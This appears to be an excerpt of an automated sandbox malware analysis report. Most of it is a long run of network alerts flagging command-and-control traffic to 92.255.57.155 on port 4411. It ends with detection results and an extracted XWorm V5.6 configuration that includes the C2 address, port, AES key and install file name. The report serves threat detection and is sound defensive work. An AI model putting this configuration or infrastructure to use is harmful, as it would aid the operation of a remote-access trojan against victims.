      2024-12-18T08:17:45.923231+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:46.116234+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:46.207798+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:46.427165+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:46.660408+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:46.709757+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:47.083075+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:47.905593+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:48.140267+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:48.545135+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:48.833927+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:49.024484+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:49.148943+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:49.842292+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.033438+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.153355+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.319790+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.464309+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.511018+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:50.849597+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.014208+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.141800+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.325980+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.624952+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:52.971915+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.042473+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.277222+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:53.444801+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:54.639300+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.248426+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.625013+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:55.913635+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.104662+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.234945+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.335800+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.570069+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:56.717128+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:57.998586+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.237203+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.429825+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:58.663864+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.260084+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.549193+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:59.967979+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.158963+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.324751+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:18:00.350050+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:43.392540+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:15:57.163921+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:11.017028+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:24.877591+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:30.407637+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:31.046398+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:31.717077+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:32.038280+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:32.324560+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:33.046685+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:33.649040+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:34.258520+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:34.498083+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:34.871488+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:35.059297+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:35.968475+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:36.204297+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:36.486225+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:36.647151+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:37.057913+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:37.177709+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:37.728261+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:37.972727+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:38.092863+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:38.457944+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:38.650360+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:38.841832+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:38.965834+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:39.637499+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:39.856187+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:40.757913+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:40.949831+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:41.673227+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:41.939616+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:42.342737+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:42.462930+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:42.629844+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:42.817854+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:44.157275+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:44.571175+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:44.733309+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:46.593476+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:47.500355+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:48.169267+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:48.305446+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:48.474790+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:48.595877+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:49.716014+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:50.051995+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:50.327274+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:50.521845+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:50.761244+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:51.121851+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:52.448689+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:52.609713+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:52.729516+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:53.137643+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:53.169297+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:53.851286+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.074535+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.288794+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.409288+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.529084+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.787487+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:54.949423+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:56.231810+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:56.411401+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:56.646506+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:59.065875+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:59.325992+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:59.669934+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:16:59.959987+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:00.274717+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:02.390921+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:02.745951+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:03.336704+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:04.485525+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:04.677904+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:05.038138+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:05.740809+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:05.959867+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:06.079475+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:06.253886+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:07.189082+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:07.841124+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:07.994625+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:08.185709+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:08.306108+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:08.469260+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:10.466720+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:11.094026+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:11.739685+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:11.989162+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:12.108948+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:12.561707+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:13.045901+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:14.118072+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:14.423615+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:14.712226+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:14.880010+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:15.005981+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:15.095064+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:15.170188+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:16.302013+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:16.541494+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:16.661126+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:16.822011+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:16.941621+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:17.684865+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:17.900676+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:18.020432+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:18.240441+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:18.299374+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:18.405983+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:19.251664+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:19.850480+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:20.089696+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:20.502020+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:20.651923+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:20.817124+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:20.940927+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:21.102061+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:22.093023+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:22.334060+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:22.456582+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:22.757469+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:22.888430+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:23.050075+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:23.740260+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:23.941869+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:25.205185+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:25.421278+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:27.757989+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:27.952931+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:28.184904+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:28.304628+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:28.827348+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:29.007625+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:29.127280+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:29.257997+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:29.664861+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:30.168343+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:30.275492+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:30.969041+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:31.562417+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:31.825731+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:32.170097+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:32.482666+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:32.661946+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:32.899698+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.033388+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.298071+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.370054+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.462123+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.489622+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.661087+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.782107+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:34.973565+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:35.814970+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:36.393762+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:36.516082+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:36.635730+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:39.421289+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:39.701496+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:40.022972+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:40.327332+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:40.671100+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:41.781321+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:42.030867+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:42.655669+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:43.260221+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:46.138020+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:46.235976+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:46.430778+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:46.862470+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:46.891939+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:47.102141+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:47.906861+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:48.231733+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:48.546132+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:48.837987+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:49.028773+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:49.149989+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:49.889402+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:50.153495+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:50.436716+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:50.511138+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:50.596929+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:50.853991+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:52.015176+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:52.420644+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:52.660907+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:53.046102+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:53.133993+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:53.279175+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:53.445717+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:54.641289+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:55.311781+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:55.684996+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:55.924147+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:56.283098+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:56.404695+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:56.604705+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:56.950326+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:57.999588+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:58.239592+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:58.664836+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:17:59.262856+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:18:00.013906+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      2024-12-18T08:18:05.990968+010028529231Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:58.442835+010028588011Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:16:39.278761+010028587991Malware Command and Control Activity Detected192.168.2.84970892.255.57.1554411TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Found malware configuration
      Source: 00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
      Multi AV Scanner detection for submitted file
      Source: QP2uO3eN2p.ps1ReversingLabs: Detection: 23%
      Source: QP2uO3eN2p.ps1Virustotal: Detection: 28%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
